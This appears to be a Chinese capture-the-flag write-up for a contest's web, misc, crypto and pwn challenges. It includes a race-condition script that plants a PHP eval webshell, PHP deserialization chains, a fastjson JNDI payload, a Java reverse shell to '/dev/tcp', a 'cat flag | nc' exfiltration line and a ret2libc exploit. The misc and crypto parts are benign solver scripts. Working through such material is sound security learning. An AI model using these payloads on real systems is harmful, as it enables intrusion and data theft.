web
rce_me
<?php
// With no `file` parameter, show this source; otherwise keep the raw, unvalidated
// value for the include further down (the only gate is the denylist in fliter()).
if (empty($_GET["file"])) {
    highlight_file(__FILE__);
} else {
    $file = $_GET["file"];
}
/**
 * Denylist filter the challenge applies to the raw query string.
 *
 * Returns false as soon as any denied fragment occurs (case-insensitive, like
 * the original stristr), true otherwise. Because it inspects the *raw* string,
 * percent-encoded forms of these characters are not matched here.
 *
 * @param string $var text to scan (the caller passes $_SERVER["QUERY_STRING"])
 */
function fliter($var): bool{
    $denied = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
    foreach ($denied as $needle) {
        if (stripos($var, $needle) !== false) {
            return false;
        }
    }
    return true;
}
// The denylist is checked against $_SERVER["QUERY_STRING"] (raw, not URL-decoded),
// while $file comes from $_GET (decoded). Whatever passes is included as PHP.
if (!fliter($_SERVER["QUERY_STRING"])) {
    die("Noooo0");
}
include $file;
获取 webshell:题目过滤了很多字符,但可以利用 echo 写 shell,参考链接 https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1 。该方法需要上传请求与包含请求并发(条件竞争 session.upload_progress),因此用下面的脚本多线程同时发包。
import io
import requests
import threading
# Session id used in the PHPSESSID cookie; read() expects the session file at /tmp/sess_<sessid>.
sessid = 'flag'
# Command run by the first-stage eval($_POST[cmd]) once the session file is included.
data = dict(cmd="system('cat f*');")
# Hard-coded CTF target.
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"
def write(session):
    """Keep uploading a file with PHP_SESSION_UPLOAD_PROGRESS set.

    Relies on PHP's session.upload_progress feature: while the upload is in
    flight the progress record (including the attacker-controlled string below)
    is written to the session file that read() races to include.
    """
    junk = b'a' * 1024 * 50
    progress = ("<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),"
                "'<?php @eval($_POST[wa1ki0g])?>');?>")
    while True:
        session.post(url,
                     data={"PHP_SESSION_UPLOAD_PROGRESS": progress},
                     files={'file': ('tgao.txt', io.BytesIO(junk))},
                     cookies={'PHPSESSID': sessid})
def read(session):
    """Race the uploader: include the in-progress session file and report success.

    Every request includes /tmp/sess_<sessid>; when the response contains the
    uploaded filename ('tgao.txt') the include executed the planted code, so the
    response is printed and the shared event cleared.

    NOTE(review): "_" is on the challenge denylist, which is applied to the raw
    QUERY_STRING, so a literal "sess_" in the URL may be answered with "Noooo0".
    It would then have to reach the server percent-encoded (%5f) — and requests'
    URL normalisation turns %5f back into "_" for unreserved characters — so
    check the raw response if the race never succeeds.
    """
    target = url + '?file=/tmp/sess_' + sessid
    while True:
        resp = session.post(target, data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
if __name__ == "__main__":
    # Shared flag cleared by read() on success; nothing waits on it, so it is
    # informational only — the worker threads loop forever.
    event = threading.Event()
    with requests.session() as session:
        workers = [threading.Thread(target=write, args=(session,)) for _ in range(1, 30)]
        workers += [threading.Thread(target=read, args=(session,)) for _ in range(1, 30)]
        for worker in workers:
            worker.start()
        event.set()
脚本运行约 10 秒后会报错,但 shell 已经写入成功。直接读取不到 flag,需要提权。目标是 Linux,先考虑 SUID 提权:`find / -perm -u=s -type f 2>/dev/null` 列出所有带 SUID 位的可执行文件,其中 date 带 SUID;SUID 的 date 可以以文件属主权限读取任意文件(例如通过 `-f` 参数,参见 GTFOBins),据此读取 flag。
step_by_step-v3
<?php
error_reporting(0); // silence warnings/notices so a broken gadget chain fails quietly
class yang
{
    public $y1;
    // Only runs on `new yang`; unserialize() does not call constructors, so the
    // chain never reaches this method.
    public function __construct()
    {
        $this->y1->magic();
    }
    // Gadget: string conversion invokes whatever is stored in $y1 as a callable
    // (e.g. a function name such as "phpinfo").
    public function __tostring()
    {
        ($this->y1)();
    }
    // Gadget: LFI sink. Includes $_GET['file'] unless it matches the pattern held
    // in $hey_mean_then, which hint.php defines (not shown here).
    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}
class cheng
{
    public $c1;
    // Gadget: runs on unserialize(). Writing a property on $c1 fires $c1's
    // __set() when $c1 is an object with no `flag` property (e.g. a bei).
    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }
    // Gadget: calling a cheng like a function forwards to $c1->hint().
    public function __invoke()
    {
        $this->c1->hint();
    }
}
class bei
{
    public $b1;
    public $b2;
    // Gadget: any write to an undefined property prints $b1, which triggers
    // __tostring() when $b1 is an object (e.g. a yang).
    public function __set($k1,$k2)
    {
        print $this->b1;
    }
    // Gadget: any call to an undefined method echoes $b1 (same string conversion).
    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}
// Sink: attacker-controlled POST data goes straight into unserialize(), which is
// what starts the __wakeup()/__set()/__tostring() chain above.
if (!isset($_POST['ans'])) {
    highlight_file(__FILE__);
} else {
    unserialize($_POST['ans']);
}
?>
看代码,yang 类的 __tostring 会把 y1 当作函数调用,因此把 y1 设为 "phpinfo" 即可。链条为:unserialize(cheng) 触发 cheng::__wakeup,给 c1->flag 赋值;c1 是没有 flag 属性的 bei 对象,于是触发 bei::__set,其中 print $this->b1;b1 是 yang 对象,被转为字符串时触发 yang::__tostring,最终执行 phpinfo()。pop 链生成脚本:
<?php
class yang
{
    public $y1; // callable name; the target's yang::__tostring() invokes it
}
class cheng
{
    public $c1; // target object whose `flag` property __wakeup() writes (a bei here)
}
class bei
{
    public $b1; // printed by the target's bei::__set(); holds the yang
    public $b2; // unused by the chain, kept so the property count matches
}
// Assemble cheng -> bei -> yang -> "phpinfo" and print the serialized payload.
$yang = new yang();
$yang->y1 = "phpinfo";
$bei = new bei();
$bei->b1 = $yang;
$cheng = new cheng();
$cheng->c1 = $bei;
echo serialize($cheng);
?>
info中直接搜索flag
simple_json
打开附件是一个 Java 包。翻看源码发现几个可疑点:存在三个路由;fastjson 版本为 1.8;带有 2 个 log4j 的包;并且 Test.class 下存在可疑的攻击点。将请求转换为 json 格式:
{
"content":{
"@type":"ycb.simple_json.service.JNDIService",
"target":"ldap://101.33.211.155:8087/aaa"
},
"msg":{
"$ref":"$.content.context"
}
}
所以开始构造 需要用到的工具:https://github.com/Bl0omZ/JNDIEXP
利用链特殊说明
snakeyaml : command=http:
ldap:
ldap:
C3p0 :command=http:
ldap:
ldap:
参照这个进行 修改vps地址,再编译,放到工具的同级目录
8 public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
9
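// Runs when the JNDI/ScriptEngine gadget instantiates the factory: spawn a
// reverse shell to the attacker's listener. exec(String[]) hands the whole
// command to bash as one argv element, so the redirections are interpreted by
// bash instead of being split by Runtime.exec's whitespace tokeniser — the
// reason the original needed the "bash -c $@|bash 0 echo ..." trick.
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec(new String[] {
            "bash", "-c", "bash -i >& /dev/tcp/xx.xx.xx/9998 0>&1"
        });
    } catch (IOException e) {
        e.printStackTrace();
    }
}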
用python3起一个http服务
python3 -m http.server 905
将 JNDIInject-1.2-SNAPSHOT.jar 服务起来,nc 监听,用 burp 发包触发。注意下面的请求头 Content-Type 是 application/x-www-form-urlencoded 而请求体是 JSON,且 Content-Length 必须与实际请求体长度一致。
POST /ApiTest/post HTTP/1.1
Host: 8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Length: 258
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Origin: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81/ApiTest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"content":{
"@type":"ycb.simple_json.service.JNDIService",
"target":
"ldap://xx.xx.xx.xx:1389/snakeyaml/http://xx.xx.xx:905/exp.jar"
},
"msg":{
"$ref":"$.content.context"
}
}
shell弹回来了 获取flag
ComeAndLogin
题目为登录可能存在注入 扫描目录存在5个文件访问 只有admin.php页面才能访问,需要admin权限 抓包发现username&password都存在注入 FUZZ发现username处过滤了单引号,并且%27,十六进制都被过滤,直接用反斜杠可以 页面返回正常 接着在password上测试,发现过滤了空格,考虑都使用url编码绕过 登录成功 再访问admin.php 根据代码提示需要以POST接收path参数的值,并且需要有大于三个以上的/,绕过即可 https://blog.csdn.net/m0_62805300/article/details/124218779 在参考文章中使用软连接获取flag 构造payload:
path=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag
Safepop
原题链接:https://xz.aliyun.com/t/10961
<?php
class Fun{
    // Callable stored on construction; serialized as "\0Fun\0func" because it is
    // private. The generator below then rewrites Fun's property count from 1 to 2,
    // presumably the classic mismatched-count trick to skip a __wakeup() check in
    // the target — confirm against the challenge source.
    private $func;
    public function __construct(){
        $this->func = [new Test,'getFlag'];
    }
}
class Test{
    // Stub: only the class and method names matter for serialize(); the real
    // getFlag() lives in the target.
    public function getFlag(){
    }
}
class A{
    public $a; // holds the Fun instance
}
class B{
    public $p; // left null; the generator also adds a dynamic `a` property (see below)
}
// Assemble B -> A -> Fun -> [Test, 'getFlag'] and emit the URL-encoded payload.
// $b->a is a dynamic property (B only declares $p), so the payload carries both
// "p" and "a" on B; PHP 8.2+ emits a deprecation for this but still works.
$fun = new Fun;
$a = new A;
$a->a = $fun;
$b = new B;
$b->a = $a;
$serialized = serialize($b);
// "Fun":1: -> "Fun":2: overstates Fun's property count (the __wakeup-bypass trick).
echo urlencode(str_replace('"Fun":1:', '"Fun":2:', $serialized));
不用改直接贴 payload:
?pop=O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D
MISC
签到
寻宝
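# Dump ./寻宝 as uppercase hex, two digits per byte, with the two digits of each
# byte swapped, written back-to-back (no separator) into ./1.txt.
with open('./寻宝', 'rb') as src:
    file = src.read()
datalist = ['{:02X}'.format(b) for b in file]
print(datalist)  # the original printed a bare generator object, which shows nothing useful
with open('./1.txt', 'w') as out:
    for j in datalist:
        out.write(j[::-1])  # swap the two hex digits of this byte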
解出的文本是十六进制,解码之后根据游戏和提示得到钢琴键对应的字符 114514。根据图片判断为差分曼彻斯特编码,01011111011000010011000101011111 解出为 _a1_,由此得到 flag.zip 的密码。最后是零宽度字符隐写。
迷失幻境
取证题目,刚好有取证大师 将镜像放入取证大师 存在两个文件,一个是45文本文件,一个是jpg文件 挨个分析两个文件 首先是45文本文件,找了一个正常的png图片和在取证大师的十六进制中45文件对比,发现文件具备png的头部信息,但是缺少png头 将45文件,放入010加补全头部信息 提取出来完整的png图 接着在在取证大师的PNG文件有99张图,抽样分析发现图都是一样的,迷惑而已 导出PNG图,用Stegolve工具异或 接着分析jpg图,是一个萝莉照片,人畜无害 结合png图的key:可莉前来报道 ,应该是跟萝莉图有关 既然有密码也有图,图片也没有加密,只有考虑为隐写了,使用outguess工具得到flag
# Extract the outguess payload from the JPEG using the key recovered from the PNG.
outguess -k "可莉前来报道" -r /home/kali/Desktop/test1/h.jpg flag.txt
where_is_secret
解出压缩包 再通过https://shimo.im/docs/gwpcxkryVJwyJVHR/read里的一起看小说吗
from PIL import Image
def decode(im):
    """Recover text hidden in pixel values.

    Each pixel encodes one character as (green << 8) + blue; red only takes part
    in the terminator test. Pixels are scanned row-major and a row is abandoned
    at its first all-zero pixel — later rows are still read. Expects 3-tuple RGB
    pixels; an RGBA image would fail on unpacking.
    """
    width, height = im.size
    chars = []
    for row in range(height):
        for col in range(width):
            r, g, b = im.getpixel((col, row))
            if (r | g | b) == 0:
                break
            chars.append(chr((g << 8) + b))
    return ''.join(chars)
if __name__=='__main__':
    # Decode ./out.bmp and save the recovered text as UTF-8.
    all_text = decode(Image.open("./out.bmp", "r"))
    with open("decode.text", "w", encoding="utf-8") as out:
        out.write(all_text)
通过筛选{}中间的值就可以得到h1d3_1n_th3_p1ctur3
Unlimited Zip Works
解压看到有注释 用zipfile分析压缩包信息并提取注释信息 看到注释里面还有个压缩包 直接提取注释中的压缩包
import zipfile
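# Walk a chain of nested archives. In this challenge each inner zip is named so
# that its first five characters are the password needed to extract it, and every
# member's zip comment is a fragment of yet another archive. Fragments are
# collected and, once a member named flag.txt is seen, concatenated in reverse
# order into newfile.zip. If an archive contains no "zip" member, `name` is not
# updated and the same archive is reopened forever (unchanged from the original).
name = 'file'
infolist = []
num = 1
newzip = b''
while True:
    # context manager closes each archive handle (the original leaked them)
    with zipfile.ZipFile(name + '.zip', 'r') as fz:
        for i in fz.namelist():
            if "zip" in i:
                filename = i[0:5]
                fz.extractall(pwd=bytes(filename, 'utf-8'))
                num += 1
                name = filename
        for j in fz.infolist():
            infolist.append(j.comment)
            if 'flag.txt' in str(j):
                print('[+] 解压完成')
                for k in infolist[::-1]:
                    newzip += k
                with open('./newfile.zip', 'wb') as f:
                    f.write(newzip)
                print("[+] 成功生成新压缩包newfile.zip")
                exit(0)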
新压缩包中还套着压缩包
from zipfile import ZipFile
# Reassemble flag.zip from the `extra` field of every member of newfile.zip,
# in archive order.
with ZipFile('newfile.zip', 'r') as zf:
    data = [info.extra for info in zf.infolist()]
with open('flag.zip', 'wb') as fz:
    fz.write(b''.join(data))
脚本直接提 图片没什么内容 010分析下面又是压缩包直接提
躲猫猫
在流量包里发现有个zip将它导出 找到一张png图片
发现压缩包里的key.log是没有加密的把它导入加解密之后在http2流量里发现了一张jpg图片将它导出 找到压缩包密码
解出压缩包 看到脚本之后发现是某ctf原题改一下x,y解密出来一张图片 https://blog.csdn.net/weixin_51122085/article/details/125851791 看到图片猜测为Dotcode但是发现这个中间是圆形或者正方形而解密出来的图片是五边形 在左侧列表中看到Maxicode中间是五边形的
CRYPTO
Easyrsa
import gmpy2
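# Peel nested RSA layers. output.txt holds one modulus per line (outermost layer
# last), and every modulus shares the prime p, so q = n // p. Each layer's
# plaintext is the next layer's ciphertext, hence c is replaced by m in the loop.
# (Indentation was lost in the source; the final print is placed after the loop,
# since intermediate plaintexts are themselves ciphertexts.)
p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
e = 65537
with open('output.txt', 'r') as f:
    moduli = [int(line) for line in f.readlines()[::-1]]
for n in moduli:
    q = n // p  # assumes p | n for every layer
    d = int(gmpy2.invert(e, (p - 1) * (q - 1)))
    m = pow(c, d, n)
    c = m
# to_bytes avoids the odd-length error bytes.fromhex(hex(m)[2:]) raises when the
# leading byte is below 0x10
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))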
lrsa
$$
\begin{aligned}
t &= (p-58)P + q - kQ \\
kQ - (p-58)P &= q - t \approx q \\
L &= \begin{pmatrix} 1 & P \\ & Q \end{pmatrix} \\
b &= (58-p,\; k)\,L = (58-p,\; q-t) \\
|b| &\le 2^{\frac{1}{4}} \det(L)^{\frac{1}{2}}
\end{aligned}
$$
由上面的关系,向量 (58-p, q-t) 是格 L 中的短向量,对 L 做格基约化即可直接得到 q-t;而 t 已知且很小,加回去就得到 q。
from Crypto.Util.number import *
# Recovery of the prime q for "lrsa" (derivation above). Judging by the names and
# the GCD/division below, PPQ = P^2*Q and PQQ = P*Q^2, so gcd(PPQ, PQQ) = P*Q.
B=1023
PPQ=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
# t is the small known offset from the derivation (t = (p-58)P + q - kQ).
t=44
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746
PQ=GCD(PPQ,PQQ)
P=PPQ//PQ
Q=PQQ//PQ
# NOTE: P, Q and t computed above are immediately overwritten by the hard-coded
# tuple on the next line; neither P nor Q is used afterwards — only a and t are.
P,Q,t=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109,26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101,44
# a is presumably the lattice output q - t (second coordinate of the short vector),
# produced offline; the reduction itself is not part of this script.
a=71239161441539946834999944364158306978517617517717217001776063773301330324729178632534286023377366747004115034635139042058644768011502688969022553791977558750633767627495955645170437100983708648876951588485253787441732757259210010467734037546118780321368088487269039555130213851691659851510403573663333586407
assert isPrime(a+t)
q=a+t
e=65537
# The ciphertext is decrypted under the prime modulus q alone, so phi = q - 1.
d=inverse(e,q-1)
m=pow(c,d,q)
print(long_to_bytes(m))
PWN
# NOTE(review): "cat/flag" is probably meant as "cat /flag" (missing space) — verify before use.
.shell cat/flag | nc 124.223.104.219 1234
fakeNoOutput-v2
from pwn import*
context.log_level='debug'
# Python 2 exploit script: str payloads are concatenated with p32() output and
# the generator is advanced with .next(), neither of which works on Python 3.
# Stage 1: overflow the request handler to leak fwrite's libc address through
# the GOT and return to main. Stage 2: ret2libc system("/bin/sh").
elf=ELF('fakeNoOutput')
p=remote('tcp.dasc.buuoj.cn',20112)
libc = ELF('libc.so.6')
# Request prologue; Content-Length is large enough to cover the oversized body.
head='''head /upload HTTP/1.1
HTTP_SERVER1_token:
User-Agent:
Cookie:
Referer:
Content-Length: 4196
'''
p.sendline(head)
p.sendline('Content:filename=')
text = 0x080496A1  # presumably a routine in the binary that writes its first argument back to the client — confirm in the disassembly
main = 0x8049F77   # return here afterwards so the server accepts a second request
setbuf = elf.got['fwrite']  # despite the name, this is fwrite's GOT slot
# 0x1040 bytes of filler reach the saved frame; 'bbbb' overwrites saved EBP.
payload='a'*0x1040
payload+='bbbb'
payload+=p32(text)    # return address
payload+=p32(main)    # return address for `text`
payload+=p32(setbuf)  # first argument of `text`: pointer to fwrite's libc address
p.sendline(payload + '\n')
# Skip the two HTTP responses that precede the leaked bytes.
p.recvuntil('Connection: close\r\n\r\n')
p.recvuntil('Connection: close\r\n\r\n')
libc_base = u32(p.recv(4))-libc.sym['fwrite']
system = libc_base+libc.sym['system']
binsh = libc_base+libc.search('/bin/sh').next()
# Stage 2: same overflow, now returning into system("/bin/sh"); 'bbbb' is the
# fake return address of system.
p.sendline(head)
p.sendline('Content:filename=')
payload='a'*0x1040
payload+='bbbb'
payload+=p32(system)
payload+='bbbb'
payload+=p32(binsh)
p.sendline(payload + '\n')
p.interactive()